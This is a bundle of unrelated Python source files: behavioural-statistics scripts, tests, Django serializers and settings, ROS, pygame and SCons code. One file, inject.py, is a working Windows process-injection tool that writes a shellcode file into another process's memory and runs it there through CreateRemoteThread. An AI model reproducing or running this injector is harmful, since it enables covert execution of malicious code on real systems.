"Dark flash block 2 end": ["b2darkflash103"],
"Dark flash block 4 start": ["ddarkflash103"],
"Dark flash block 4 end": ["d2darkflash103"]}
direction_swaps = ["rhofrac", "latency", "interboutinterval", "fullboutdatamaxloc"]
for file in glob.glob("*linearmodel*"): # THIS IS WHAT THE PRINT OUTPUT MUST POINT TO, CAN HAVE SOMETHING AT END, BUT MUST START THIS WAY
if "finalsorted" in file:
continue
dir = os.path.basename(os.path.dirname(os.path.realpath(__file__)))
ffile = open('finalsortedupdatedCP4or2_' + file + "_" + dir, 'w')
ofile = open(file, 'r')
lines = ofile.readlines()
pdict = {}
for line in lines:
# anova data
if line.startswith("anova:"):
pval = line.split(":")[3].strip().split()[3].strip()
#anova: ribgraph_mean_ribbon_latencyresponse_dpix_nighttappost102.png : Mean of array wt, mut, H-stat, P-value: 25.8557471264 21.4177419355 2.63243902441 0.104700765405
meanwtminmut = float(line.split(":")[3].strip().split()[0]) - float(line.split(":")[3].strip().split()[1])
name = line.split(":")[1].strip()
pdict[name] = [pval, meanwtminmut]
# linear mixed model data - this formatting could change if I change the linear model I'm using
else:
list = []
for line in range(0, len(lines)):
#print lines[line]
if lines[line].startswith("mutornot[T.wt] "):
#print lines[line]
if len(lines[line].split()) > 3:
pvalue = lines[line].split()[4]
coef = lines[line].split()[1]
if float(pvalue) == 0:
pvalue = 0.001
list.append((float(pvalue), float(coef), lines[line-13].strip()))
#list.append((float(pvalue), lines[line-13].strip(), lines[line].split()[1:6]))
# list2 = sorted(list, key=lambda x: x[0])
for fline in list:
#pdict[str(fline[2])] = (str(fline[0])[:8], str(fline[1])[:8])
pdict[str(fline[2])] = [str(fline[0])[:8], str(fline[1])[:8]]
#ffile.write(str(fline[0])[:8])
#ffile.write(', ')
#ffile.write(str(fline[1])[:8])
#ffile.write(', ')
#ffile.write(str(fline[2]))
#ffile.write('\n')
splitdict = {}
for k in pdict:
# k = ribgraph_mean_ribbonbout_dpixavebouttime_min_day1taps.png
# section = day1taps
# or section = adaytappostbdaytappre102
if k.startswith("ratio"):
continue
section = k.split('.')[0].split('_')[-1]
for k2 in nonstimcombos.keys():
# k2 = "Frequency of movement"
for v2 in nonstimcombos[k2]:
# v2 = numberofbouts_min
if v2 in k:
test = False
for k3 in splitdict.keys():
if (k2 + " " + section) == k3:
test = True
if test == False:
splitdict[k2 + " " + section] = []
splitdict[k2 + " " + section].append([k,pdict[k]])
else:
splitdict[k2 + " " + section].append([k,pdict[k]])
break
for sk2 in stimcombos.keys():
# sk2 = "Night light flash"
for sv2 in stimcombos[sk2]:
# sv2 = nightlightflash104
if sv2 == k.split('.')[0].split('_')[-1]:
# combining everything for these stimuli responses
test = False
for sk3 in splitdict.keys():
if sk2 == sk3:
test = True
if test == False:
splitdict[sk2] = []
splitdict[sk2].append([k,pdict[k]])
else:
splitdict[sk2].append([k,pdict[k]])
break
for skey in splitdict.keys():
lowest = 10
listints = []
cutpoint = 0.05
cutpointnumber = 3
if skey in stimcombos.keys():
cutpointnumber = 4
else:
cutpointnumber = 3
cutlist = []
for t in typecombos:
for tt in t:
if skey == tt:
#cutpointnumber = 4
#print "TEST", skey, t
import copy
shortt = copy.copy(t)
shortt.remove(tt)
#print shortt
for svey0 in splitdict[skey]:
if abs(float(svey0[1][0])) < cutpoint:
if "bigmovesribgraph_mean_ribbon_freqresponse_dpix_" in svey0[0] and "100b.png" in svey0[0]:
cutpointnumber = 0
#print "testing1 ", skey, svey0
for ttt in shortt:
for tsvey in splitdict[ttt]:
#print "testing3", ttt, tsvey
if '_'.join(svey0[0].split('.')[0].split('_')[:-1]) == '_'.join(tsvey[0].split('.')[0].split('_')[:-1]):
#print "testing4", ttt, tsvey, '_'.join(svey0[0].split('.')[0].split('_')[:-1]), '_'.join(tsvey[0].split('.')[0].split('_')[:-1])
if abs(float(tsvey[1][0])) < cutpoint:
#print "testing5", tsvey
cutpointnumber = 2
break
for svey in splitdict[skey]:
switch = False
for x in direction_swaps:
if x in svey[0]:
switch = True
if switch == False:
if float(svey[1][1]) > 0:
# change the sign of the original data
# if wt is moving more than mutant (>0), want signs swapped so mutant is over wt (ie, mutant moving less than wt has - number)
svey[1][0] = float(svey[1][0]) * -1
# else, data is fine as is
else: # switch == True
# in the cases where a switch is needed for the sign (such as interboutinterval because it's opposite when considering frequency)
if float(svey[1][1]) < 0: # if wt has greater interboutinterval and then the number is positive (ie, mutant moves more), don't swap, do swap if <
# change the sign of the original data
svey[1][0] = float(svey[1][0]) * -1
#lowest = 10
#listints = []
#cutpoint = 0.05
#cutpointnumber = 3
#cutlist = []
for svey in splitdict[skey]:
#print skey, svey
listints.append(float(svey[1][0]))
if abs(float(svey[1][0])) < abs(lowest):
lowest = float(svey[1][0])
if abs(float(svey[1][0])) < cutpoint:
cutlist.append(float(svey[1][0]))
ave = np.mean(np.absolute(np.asarray(listints)))
if lowest < 0:
ave = ave * -1
if len(cutlist) > cutpointnumber:
cutave = np.mean(np.absolute(np.asarray(cutlist)))
if lowest < 0:
cutave = cutave * -1
else:
cutave = ave
ffile.write("Lowest ")
ffile.write(skey)
ffile.write(": ")
ffile.write(str(lowest))
ffile.write('\n')
ffile.write("Average ")
ffile.write(skey)
ffile.write(": ")
ffile.write(str(ave))
ffile.write('\n')
ffile.write("Lowaverage (reg if not >")#3, <0.05) ")
ffile.write(str(cutpointnumber))
ffile.write(", <0.05) ")
ffile.write(skey)
ffile.write(": ")
ffile.write(str(cutave))
ffile.write('\n')
for svey in splitdict[skey]:
ffile.write(str(svey[0]))
ffile.write(', ')
ffile.write(str(svey[1][0]))
ffile.write(', ')
ffile.write(str(svey[1][1]))
ffile.write('\n')
#print splitdict
#ffile.write(k)
#ffile.write(', ')
#ffile.write(str(pdict[k][0]))
#ffile.write(', ')
#ffile.write(str(pdict[k][1]))
#ffile.write('\n')
|
import numpy as np
import sys
import os
from utils import *
from utils_procs import *
_, input_fname = sys.argv
input_path = '../story/'
train_test_ratio = .9
def get_word_level_rep(text, output_path, train_test_ratio):
# convert to word-level representation
indices, _, words_dict = text_2_one_hot(text)
index_string = list_of_int_to_int_string(indices)
# save .npz word file and its dictionary
save_list_of_int_to_npz(indices, words_dict, output_path, train_test_ratio)
save_dict(words_dict, output_path)
# write to output file - char level
write2file(text, 'chars_we.txt', output_path)
[text] = remove_end_markers([text])
write2file(text, 'chars_woe.txt', output_path)
input_path = os.path.join(input_path,input_fname)
print('Input text from <%s>' % os.path.abspath(input_path))
input_file_path = os.path.join(input_path, input_fname + '.txt')
input_file = open(input_file_path, 'r')
text = input_file.read()
output_path = input_path
make_output_cond_dirs(output_path)
text = str2cleanstr(text)
text_shufw = shuffle_words_in_state(text)
text_shufs = shuffle_states_in_story(text)
[text, text_shufw, text_shufs] = to_lower_case([text, text_shufw, text_shufs])
get_word_level_rep(text, os.path.join(output_path, 'shuffle_none'), train_test_ratio)
get_word_level_rep(text_shufw, os.path.join(output_path, 'shuffle_words'), train_test_ratio)
get_word_level_rep(text_shufs, os.path.join(output_path, 'shuffle_states'), train_test_ratio)
|
import sys
import datetime
from threading import Thread
class ProcPing(Thread):
def __init__(self, name, data, qtdMsg):
Thread.__init__(self)
self.name = name
self.data = data
self.qtdMsg = qtdMsg
self.mailBox = []
def setPeer(self, Peer):
self.Peer = Peer
def send(self, dado):
self.Peer.mailBox = dado
def recv(self):
while True:
if not len(self.mailBox) < len(self.data):
print(self)
self.mailBox = []
break
def run(self):
for i in range (0, self.qtdMsg + 1):
self.send(self.data)
if i < self.qtdMsg:
self.recv()
class PingPing(Thread):
def __init__(self, tamMsg, qtdMsg):
Thread.__init__(self)
self.tamMsg = tamMsg
self.qtdMsg = qtdMsg
def run(self):
index = 0
array = [1]
while index < self.tamMsg -1:
array.append(1)
index = index + 1
p1 = ProcPing("1", array, self.qtdMsg)
p2 = ProcPing("2", array, self.qtdMsg)
p2.setPeer(p1)
p1.setPeer(p2)
timeStart = datetime.datetime.now()
p1.start()
p2.start()
p1.join()
p2.join()
timeEnd = datetime.datetime.now()
timeExec = timeEnd - timeStart
line = "%d\t%d\t%s\n" % (self.tamMsg, self.qtdMsg, timeExec)
try:
arq = open('saida.txt', 'r')
textoSaida = arq.read()
arq.close()
except:
arq = open('saida.txt', 'w')
textoSaida = ""
arq.close()
arq = open('saida.txt', 'w')
textoSaida = textoSaida + line
arq.write(textoSaida)
arq.close()
def main():
param = sys.argv[1:]
tamMsg = int(param[0])
qtdMsg = int(param[1])
pingPing = PingPing(tamMsg, qtdMsg)
pingPing.start()
if __name__=="__main__":
main()
|
import unittest
from broca.tokenize import keyword, util, LemmaTokenizer
class KeywordTokenizeTests(unittest.TestCase):
def setUp(self):
self.docs = [
'This cat dog is running happy.',
'This cat dog runs sad.'
]
def test_overkill(self):
expected_t_docs = [
['cat dog', 'run', 'happy'],
['cat dog', 'run', 'sad']
]
t_docs = keyword.OverkillTokenizer(lemmatize=True,
min_count=1,
threshold=0.1).tokenize(self.docs)
self.assertEqual(t_docs, expected_t_docs)
def test_rake(self):
expected_t_docs = [
['cat dog', 'running happy'],
['cat dog runs sad']
]
t_docs = keyword.RAKETokenizer().tokenize(self.docs)
# Order not necessarily preserved
for i, output in enumerate(t_docs):
self.assertEqual(set(output), set(expected_t_docs[i]))
def test_apriori(self):
expected_t_docs = [
['cat dog'],
['cat dog']
]
t_docs = keyword.AprioriTokenizer().tokenize(self.docs)
self.assertEqual(t_docs, expected_t_docs)
def test_pos(self):
expected_t_docs = [
['cat dog'],
['cat dog']
]
t_docs = keyword.POSTokenizer().tokenize(self.docs)
self.assertEqual(t_docs, expected_t_docs)
def test_overkill_parallel(self):
expected_t_docs = [
['cat dog', 'run', 'happy'],
['cat dog', 'run', 'sad']
]
t_docs = keyword.OverkillTokenizer(lemmatize=True,
min_count=1,
threshold=0.1,
n_jobs=2).tokenize(self.docs)
self.assertEqual(t_docs, expected_t_docs)
def test_rake_parallel(self):
expected_t_docs = [
['cat dog', 'running happy'],
['cat dog runs sad']
]
t_docs = keyword.RAKETokenizer(n_jobs=-1).tokenize(self.docs)
# Order not necessarily preserved
for i, output in enumerate(t_docs):
self.assertEqual(set(output), set(expected_t_docs[i]))
class TokenizeTests(unittest.TestCase):
def setUp(self):
self.docs = [
'This cat dog is running happy.',
'This cat dog runs sad.'
]
def test_lemma(self):
expected_t_docs = [
['cat', 'dog', 'run', 'happy', '.'],
['cat', 'dog', 'run', 'sad', '.']
]
t_docs = LemmaTokenizer().tokenize(self.docs)
self.assertEqual(t_docs, expected_t_docs)
def test_prune(self):
t_docs = [
['cat', 'cat dog', 'happy', 'dog', 'dog'],
['cat', 'cat dog', 'sad']
]
expected_t_docs = [
['cat dog', 'happy', 'dog', 'dog'],
['cat dog', 'sad']
]
t_docs = util.prune(t_docs)
self.assertEqual(t_docs, expected_t_docs)
|
from lxml import etree
from okcupyd import xpath
def test_selected_attribute():
node = xpath.XPathNode(element='element', selected_attribute='value')
assert node.xpath == '//element/@value'
tree = etree.XML("<top><container><element value='1'>"
"</element><element value='2'></element>"
"</container></top>")
builder = xpath.xpb.container.element.select_attribute_('value')
assert builder.xpath == './/container//element/@value'
assert builder.apply_(tree) == ['1', '2']
assert xpath.xpb.element.select_attribute_('value', elem=tree) == \
['1', '2']
def test_text_for_many():
tree = etree.XML("<top><container>"
"<element value='1'>one</element>"
"<element value='2'>two</element>"
"</container></top>")
result = xpath.xpb.container.element.text_.apply_(tree)
assert set(result) == set(['one', 'two'])
def test_attribute_contains():
tree = etree.XML("<top><elem a='complete'></elem></top>")
assert xpath.xpb.elem.attribute_contains('a', 'complet').apply_(tree) != []
def test_text_contains():
element_text = "cool stuff44"
tree = etree.XML("<top><elem>{0}</elem><elem></elem>"
"<elem>other things</elem></top>".format(element_text))
result = xpath.xpb.elem.text_contains_("stuff").text_.apply_(tree)
result_text, = result
assert result_text == element_text
result = xpath.xpb.elem.text_contains_("afdsafdsa").text_.apply_(tree)
assert result == []
|
import pygame
from Game.Shared import GameConstants
from Game.Bricks import Brick
from Game.Ball import Ball
class BallSpawningBrick(Brick):
def __init__(self, position, game, points=400, color=(150, 150, 150),
sprite=pygame.Surface(GameConstants.BRICK_SIZE)):
super(BallSpawningBrick, self).__init__(position, game, points=points,
color=color, sprite=sprite)
pygame.font.init()
font = pygame.font.Font(None, 16)
renderedText = font.render("Extra", True, (0, 0, 0))
textWidth, textHeight = renderedText.get_size()
blitX = int(GameConstants.BRICK_SIZE[0] / 2.0) - int(textWidth / 2.0)
blitY = int(GameConstants.BRICK_SIZE[1] / 2.0) - int(textHeight / 2.0)
self.sprite.blit(renderedText, (blitX, blitY))
def hit(self, ball):
super(BallSpawningBrick,self).hit(ball)
positionX = self.position[0] + int(GameConstants.BRICK_SIZE[0] / 2.0) - int(GameConstants.BALL_SIZE[0] / 2.0)
positionY = self.position[1] + int(GameConstants.BRICK_SIZE[1] / 2.0) - int(GameConstants.BALL_SIZE[1] / 2.0)
self.game.balls.append(Ball(self.game, position=(positionX, positionY)))
|
from som.interp_type import is_ast_interpreter
from som.primitives.primitives import Primitives
from som.vm.globals import trueObject, falseObject, nilObject
from som.vmobjects.primitive import UnaryPrimitive, BinaryPrimitive, TernaryPrimitive
if is_ast_interpreter():
from som.vmobjects.block_ast import AstBlock as _Block
else:
from som.vmobjects.block_bc import BcBlock as _Block
def _not(_rcvr):
return falseObject
def _or(_rcvr, _arg):
return trueObject
def _and_and_if_true(_rcvr, arg):
if isinstance(arg, _Block):
block_method = arg.get_method()
return block_method.invoke_1(arg)
return arg
def _if_false(_rcvr, _arg):
return nilObject
def _if_true_if_false(_rcvr, true_block, _false_block):
if isinstance(true_block, _Block):
block_method = true_block.get_method()
return block_method.invoke_1(true_block)
return true_block
class TruePrimitivesBase(Primitives):
def install_primitives(self):
self._install_instance_primitive(UnaryPrimitive("not", _not))
self._install_instance_primitive(BinaryPrimitive("or:", _or))
self._install_instance_primitive(BinaryPrimitive("||", _or))
self._install_instance_primitive(BinaryPrimitive("and:", _and_and_if_true))
self._install_instance_primitive(BinaryPrimitive("&&", _and_and_if_true))
self._install_instance_primitive(BinaryPrimitive("ifTrue:", _and_and_if_true))
self._install_instance_primitive(BinaryPrimitive("ifFalse:", _if_false))
self._install_instance_primitive(
TernaryPrimitive("ifTrue:ifFalse:", _if_true_if_false)
)
|
from swgpy.object import *
def create(kernel):
result = Intangible()
result.template = "object/draft_schematic/droid/component/shared_advanced_droid_frame.iff"
result.attribute_template_id = -1
result.stfName("string_id_table","")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
|
import rospy
from geometry_msgs.msg import Twist
def callback_function(data):
#FILL IN HERE
global publisher_name, msg
msg.linear.x = -data.linear.x
msg.angular.z = -data.angular.z
publisher_name.publish(msg)
def subscriber_name():
# Initialize node
rospy.init_node('subscriber_name', anonymous=True)
#FILL IN HERE
global publisher_name,msg
msg = Twist()
publisher_name = rospy.Publisher('remapped_topic_name',Twist,queue_size = 16)
rospy.Subscriber('turtle1/cmd_vel', Twist, callback_function)
rospy.Rate(30)
rospy.spin()
if __name__ == '__main__':
try:
subscriber_name()
except rospy.ROSInterruptException:
pass
|
from django.http import HttpRequest
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
try:
from allauth.account import app_settings as allauth_settings
from allauth.utils import (email_address_exists,
get_username_max_length)
from allauth.account.adapter import get_adapter
from allauth.account.utils import setup_user_email
except ImportError:
raise ImportError("allauth needs to be added to INSTALLED_APPS.")
from rest_framework import serializers
from requests.exceptions import HTTPError
if 'allauth.socialaccount' in settings.INSTALLED_APPS:
from allauth.socialaccount.helpers import complete_social_login
class SocialLoginSerializer(serializers.Serializer):
access_token = serializers.CharField(required=False, allow_blank=True)
code = serializers.CharField(required=False, allow_blank=True)
def _get_request(self):
request = self.context.get('request')
if not isinstance(request, HttpRequest):
request = request._request
return request
def get_social_login(self, adapter, app, token, response):
"""
:param adapter: allauth.socialaccount Adapter subclass.
Usually OAuthAdapter or Auth2Adapter
:param app: `allauth.socialaccount.SocialApp` instance
:param token: `allauth.socialaccount.SocialToken` instance
        :param response: Provider's response for OAuth1. Not used in the
            OAuth2 flow.
        :returns: A populated instance of
            `allauth.socialaccount.models.SocialLogin`
"""
request = self._get_request()
social_login = adapter.complete_login(request, app, token, response=response)
social_login.token = token
return social_login
def validate(self, attrs):
view = self.context.get('view')
request = self._get_request()
if not view:
raise serializers.ValidationError(
_("View is not defined, pass it as a context variable")
)
adapter_class = getattr(view, 'adapter_class', None)
if not adapter_class:
raise serializers.ValidationError(_("Define adapter_class in view"))
adapter = adapter_class(request)
app = adapter.get_provider().get_app(request)
# More info on code vs access_token
# http://stackoverflow.com/questions/8666316/facebook-oauth-2-0-code-and-token
# Case 1: We received the access_token
if attrs.get('access_token'):
access_token = attrs.get('access_token')
# Case 2: We received the authorization code
elif attrs.get('code'):
self.callback_url = getattr(view, 'callback_url', None)
self.client_class = getattr(view, 'client_class', None)
if not self.callback_url:
raise serializers.ValidationError(
_("Define callback_url in view")
)
if not self.client_class:
raise serializers.ValidationError(
_("Define client_class in view")
)
code = attrs.get('code')
provider = adapter.get_provider()
scope = provider.get_scope(request)
client = self.client_class(
request,
app.client_id,
app.secret,
adapter.access_token_method,
adapter.access_token_url,
self.callback_url,
scope
)
token = client.get_access_token(code)
access_token = token['access_token']
else:
raise serializers.ValidationError(
_("Incorrect input. access_token or code is required."))
social_token = adapter.parse_token({'access_token': access_token})
social_token.app = app
try:
login = self.get_social_login(adapter, app, social_token, access_token)
complete_social_login(request, login)
except HTTPError:
raise serializers.ValidationError(_('Incorrect value'))
if not login.is_existing:
login.lookup()
login.save(request, connect=True)
attrs['user'] = login.account.user
return attrs
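# Typical wiring for SocialLoginSerializer (illustrative; the adapter, client
# class and callback URL depend on the provider and project). callback_url and
# client_class are only needed when logging in with an authorization code:
#
#   class GitHubLogin(SocialLoginView):
#       adapter_class = GitHubOAuth2Adapter
#       client_class = OAuth2Client
#       callback_url = 'https://example.com/accounts/github/login/callback/'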
class RegisterSerializer(serializers.Serializer):
username = serializers.CharField(
max_length=get_username_max_length(),
min_length=allauth_settings.USERNAME_MIN_LENGTH,
required=allauth_settings.USERNAME_REQUIRED
)
email = serializers.EmailField(required=allauth_settings.EMAIL_REQUIRED)
password1 = serializers.CharField(write_only=True)
password2 = serializers.CharField(write_only=True)
def validate_username(self, username):
username = get_adapter().clean_username(username)
return username
def validate_email(self, email):
email = get_adapter().clean_email(email)
if allauth_settings.UNIQUE_EMAIL:
if email and email_address_exists(email):
raise serializers.ValidationError(
_("A user is already registered with this e-mail address."))
return email
def validate_password1(self, password):
return get_adapter().clean_password(password)
def validate(self, data):
if data['password1'] != data['password2']:
raise serializers.ValidationError(_("The two password fields didn't match."))
return data
def custom_signup(self, request, user):
pass
def get_cleaned_data(self):
return {
'username': self.validated_data.get('username', ''),
'password1': self.validated_data.get('password1', ''),
'email': self.validated_data.get('email', '')
}
def save(self, request):
adapter = get_adapter()
user = adapter.new_user(request)
self.cleaned_data = self.get_cleaned_data()
adapter.save_user(request, user, self)
self.custom_signup(request, user)
setup_user_email(request, user, [])
return user
class VerifyEmailSerializer(serializers.Serializer):
key = serializers.CharField()
|
import binascii
import sys
from ctypes import *
if len(sys.argv) < 3:
print("usage inject.py <shellcodefile.bin> <pid>")
sys.exit(1)
file = open(sys.argv[1],'rb')
buff=file.read()
file.close()
print("buffer length = ")
print(len(buff))
print("pid = "+sys.argv[2])
handle = windll.kernel32.OpenProcess(0x1f0fff,0, int(sys.argv[2]))
if (handle == 0):
print("handle == 0")
sys.exit(1)
addr = windll.kernel32.VirtualAllocEx(handle,0,len(buff),0x3000|0x1000,0x40)
if(addr == 0):
print("addr = = 0")
sys.exit(1)
bytes = c_ubyte()
windll.kernel32.WriteProcessMemory(handle, addr , buff, len(buff), byref(bytes))
handle1=windll.kernel32.CreateRemoteThread(handle , 0x0, 0x0 , addr, 0x0,0x0 , 0x0)
if(handle1 == 0):
print("handle1 = = 0");
sys.exit(1)
windll.kernel32.CloseHandle(handle)
|
import os
PROJECT_ROOT = os.path.dirname(__file__)
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@domain.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': os.path.join(PROJECT_ROOT, 'dev.db'), # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
TIME_ZONE = 'America/Chicago'
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
USE_I18N = True
USE_L10N = True
MEDIA_ROOT = ''
MEDIA_URL = ''
ADMIN_MEDIA_PREFIX = '/media/'
SECRET_KEY = '44mxeh8nkm^ycwef-eznwgk&8_lwc!j9r)h3y_^ypz1iom18pa'
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'testautoslug.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.admin',
'testapp',
)
|
import zmq
class JRPC:
def __init__(self):
self.id = 0
def make_noti(self, method, params=None):
noti = {"jsonrpc":"2.0", "method":method}
if params is not None:
noti["params"] = params
return noti
def make_req(self, method, params=None):
req = self.make_noti(method, params)
req["id"] = self.id
self.id += 1
return req
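# A request built by make_req("echo", [10, 5]) serialises to:
#   {"jsonrpc": "2.0", "method": "echo", "params": [10, 5], "id": 0}
# make_noti() produces the same structure without the "id" member, which is
# what makes it a JSON-RPC 2.0 notification.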
zctx = zmq.Context.instance()
zsock = zctx.socket(zmq.REQ)
zsock.connect("tcp://127.0.0.1:10000")
jrpc = JRPC()
req = jrpc.make_req("echo", [10, 5])
zsock.send_json(req)
rep = zsock.recv_json()
assert(rep['result']==req['params'])
req = jrpc.make_req("counter")
zsock.send_json([req]*10)
batchrep = zsock.recv_json()
counts = [rep['result'] for rep in batchrep]
for k in range(1,len(counts)):
assert counts[k] - counts[k-1] == 1
batchreq = []
for k in range(10):
batchreq.append(jrpc.make_req("sum", range(1+k)))
zsock.send_json(batchreq)
batchrep = zsock.recv_json()
for k in range(10):
assert(batchrep[k]['result']==sum(range(1+k)))
a = range(3)
o = {1:1, 2:2, 3:3}
d = { "one": "un", "two": 2, "three": 3.0, "four": True, "five": False, "six": None, "seven":a, "eight":o }
req = jrpc.make_noti("iterate", d)
zsock.send_json(req)
rep = zsock.recv()
assert not rep
req = jrpc.make_noti("iterate", a)
zsock.send_json(req)
rep = zsock.recv()
assert not rep
req = jrpc.make_noti("foreach", d)
zsock.send_json(req)
rep = zsock.recv()
assert not rep
req = jrpc.make_noti("foreach", a)
zsock.send_json(req)
rep = zsock.recv()
assert not rep
|
""" Discover Cambridge Audio StreamMagic devices. """
from . import SSDPDiscoverable
class Discoverable(SSDPDiscoverable):
"""Add support for discovering Cambridge Audio StreamMagic devices."""
def get_entries(self):
"""Get all Cambridge Audio MediaRenderer uPnP entries."""
return self.find_by_device_description({
"manufacturer": "Cambridge Audio",
"deviceType": "urn:schemas-upnp-org:device:MediaRenderer:1"
})
|
"""Script to display a collection of paths after inserting one new path
Usage:
add_to_a_path.py [-U] PATHS PATH
add_to_a_path.py [-U] (-s | -i INDEX ) PATHS PATH
Options:
-h, --help Show this help and exit
-v, --version Show version number and exit
-s, --start Add the path at start of list of paths
-i INDEX, --index=INDEX The index at which the path will be inserted
Examples of use:
$ export PATH=/bin:/usr/bin
$ add_to_a_path.py PATH /usr/local/bin
PATH=/bin:/usr/bin:/usr/local/bin
$ add_to_a_path.py PATH /usr/local/bin --start
PATH=/usr/local/bin:/bin:/usr/bin
"""
from __future__ import print_function
import os
import sys
import argparse
from bdb import BdbQuit
__version__ = '0.1.0'
class ScriptError(NotImplementedError):
pass
def version():
    print('%s %s' % (sys.argv[0], __version__))
raise SystemExit
def parse_args():
"""Parse out command line arguments"""
parser = argparse.ArgumentParser(description=__doc__.splitlines()[0])
parser.add_argument('symbol', help='The bash symbol to be changed')
parser.add_argument('path', help='The path to be added')
parser.add_argument('-s', '--start', action='store_true',
help='Add the path at start of list of paths')
parser.add_argument('-i', '--index', type=int,
help='The index at which the path will be inserted')
parser.add_argument('-v', '--version', action='store_true',
help='Show version')
args = parser.parse_args()
if args.version:
version()
    if args.index is None:
if args.start:
args.index = 0
else:
args.index = False
return args
def _add_symbol_to_paths(paths, symbol, i):
if i is False:
i = len(paths)
result = paths[:]
if not symbol:
return result
if symbol not in result:
result.insert(i, symbol)
return result
j = result.index(symbol)
if i != j:
del result[j]
result.insert(i, symbol)
return result
def get_arg_path(args):
path = args.path
if not path:
return ''
user_path = os.path.expanduser(path)
real_path = os.path.realpath(user_path)
if not os.path.isdir(real_path):
return ''
return real_path
def split_paths(string):
if not string:
return []
return [p for p in string.split(os.path.pathsep) if p]
def get_paths(args):
symbol = args.symbol
paths_string = ''
if symbol in os.environ:
paths_string = os.environ[symbol]
elif os.path.pathsep in symbol:
paths_string = symbol
return split_paths(paths_string)
def script(args):
arg_path = get_arg_path(args)
paths = get_paths(args)
if not arg_path:
if not paths:
return False
elif os.path.isdir(arg_path):
if arg_path in paths:
paths.remove(arg_path)
paths = _add_symbol_to_paths(paths, arg_path, args.index)
else:
return False
print('='.join((args.symbol, os.path.pathsep.join(paths))))
return True
def main():
"""Run the script"""
try:
args = parse_args()
return os.EX_OK if script(args) else not os.EX_OK
except (SystemExit, BdbQuit):
pass
return os.EX_OK
if __name__ == '__main__':
sys.exit(main())
|
import os.path
import SCons.Tool
import aql
_Warning = aql.Warning
_Tool = SCons.Tool.Tool
def generate( env ):
toolsets = (
"aql_tool_gcc",
"aql_tool_msvc",
#~ "aql_tool_bcc"
)
for tool in toolsets:
tool = _Tool( tool )
if tool.exists( env ):
tool( env )
return
_Warning("C/C++ toolchain has not been found.")
default_tool_name = os.path.splitext( os.path.basename( __file__ ) )[0]
env['TOOLS'].remove( default_tool_name )
def exists(env):
return 1
|
from setuptools import setup
from os import path, environ
from sys import argv
here = path.abspath(path.dirname(__file__))
try:
if argv[1] == "test":
environ['PYTHONPATH'] = here
except IndexError:
pass
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='libfs',
version='0.1',
description='Library Filesystem',
long_description=long_description,
author='Christof Hanke',
author_email='christof.hanke@induhviduals.de',
url='https://github.com/ya-induhvidual/libfs',
packages=['Libfs'],
license='MIT',
install_requires=['llfuse', 'mutagenx'],
test_suite="test/test_all.py",
scripts=['scripts/libfs.py'],
keywords='fuse multimedia',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: End Users/Desktop',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Operating System :: MacOS :: MacOS X',
'Operating System :: POSIX :: BSD :: FreeBSD',
'Operating System :: POSIX :: Linux',
'Topic :: System :: Filesystems'
],
)
|
from __future__ import with_statement
import unittest
from xml.etree.ElementTree import fromstring
from xmlbuilder import XMLBuilder
def xmlStructureEqual(xml1,xml2):
tree1 = fromstring(xml1)
tree2 = fromstring(xml2)
return _xmlStructureEqual(tree1,tree2)
def _xmlStructureEqual(tree1,tree2):
if tree1.tag != tree2.tag:
return False
attr1 = list(tree1.attrib.items())
attr1.sort()
attr2 = list(tree2.attrib.items())
attr2.sort()
if attr1 != attr2:
return False
    children1 = list(tree1)
    children2 = list(tree2)
    if len(children1) != len(children2):
        return False
    return all(_xmlStructureEqual(c1, c2) for c1, c2 in zip(children1, children2))
result1 = \
"""
<root>
<array />
<array len="10">
<el val="0" />
<el val="1">xyz</el>
<el val="2">abc</el>
<el val="3" />
<el val="4" />
<el val="5" />
<sup-el val="23">test </sup-el>
</array>
</root>
""".strip()
class TestXMLBuilder(unittest.TestCase):
def testShift(self):
xml = (XMLBuilder() << ('root',))
self.assertEqual(str(xml),"<root />")
xml = XMLBuilder()
xml << ('root',"some text")
self.assertEqual(str(xml),"<root>some text</root>")
xml = XMLBuilder()
xml << ('root',{'x':1,'y':'2'})
self.assert_(xmlStructureEqual(str(xml),"<root x='1' y='2'>some text</root>"))
xml = XMLBuilder()
xml << ('root',{'x':1,'y':'2'})
self.assert_(xmlStructureEqual(str(xml),"<root x='1' y='2'></root>"))
xml = XMLBuilder()
xml << ('root',{'x':1,'y':'2'})
self.assert_(not xmlStructureEqual(str(xml),"<root x='2' y='2'></root>"))
xml = XMLBuilder()
xml << ('root',"gonduras.ua",{'x':1,'y':'2'})
        self.assertTrue(xmlStructureEqual(str(xml),"<root x='1' y='2'>gonduras.ua</root>"))
xml = XMLBuilder()
xml << ('root',"gonduras.ua",{'x':1,'y':'2'})
        self.assertTrue(xmlStructureEqual(str(xml),"<root x='1' y='2'>gonduras.com</root>"))
#---------------------------------------------------------------------------
def testWith(self):
xml = XMLBuilder()
        with xml.root(length = 12):
pass
        self.assertEqual(str(xml),'<root length="12" />')
xml = XMLBuilder()
with xml.root():
xml << "text1" << "text2" << ('some_node',)
